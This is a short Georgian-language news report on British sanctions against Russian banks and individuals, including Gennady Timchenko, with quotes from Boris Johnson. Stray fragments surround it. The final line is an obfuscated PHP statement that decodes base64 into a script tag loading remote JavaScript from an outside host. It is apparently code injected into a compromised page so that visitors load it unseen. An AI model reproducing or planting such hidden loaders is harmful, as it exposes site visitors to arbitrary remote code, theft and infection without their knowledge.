gorgia
ავერსი jaluzi
დიდმა ბრიტანეთმა რუსეთს "მკაცრი ეკონომიკური" სანქციები დაუწესა, რითაც პუტინის მიერ აღმოსავლეთ უკრაინის ორ სეპარატისტულ რეგიონში ჯარების განლაგების ბრძანების გაცემას უპასუხა.
 
საერთაშორისო მედიის ინფორმაციით, კერძოდ, სანქციები ეხება ხუთ რუსულ ბანკს და სამ გავლენიან პირს, მათ შორის გენადი ტიმჩენკოს.
 
"ეს არის პირველი ტრანში, პირველი ბარიერი, რისი გაკეთებისთვისაც ჩვენ მზად ვართ", - განაცხადა ბორის ჯონსონმა პარლამენტში. 
 
ამასთან, პირებს, ვისაც სანქციები დაუწესდებათ, ეკრძალებათ დიდ ბრიტანეთში შესვლა, ამის შესახებ ბორის ჯონსონმა განაცხადა. 
 
"ნებისმიერი აქტივი, რომელსაც ისინი ფლობენ დიდ ბრიტანეთში, გაიყინება და ამ პირებს აეკრძალებათ აქ მოგზაურობა", - თქვა ჯონსონმა.
 
სანქცირებული ბანკების ჩამონათვალი  Rossiya, IS Bank, General Bank, Promsvyazbank და Black Sea Bank.
1125
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");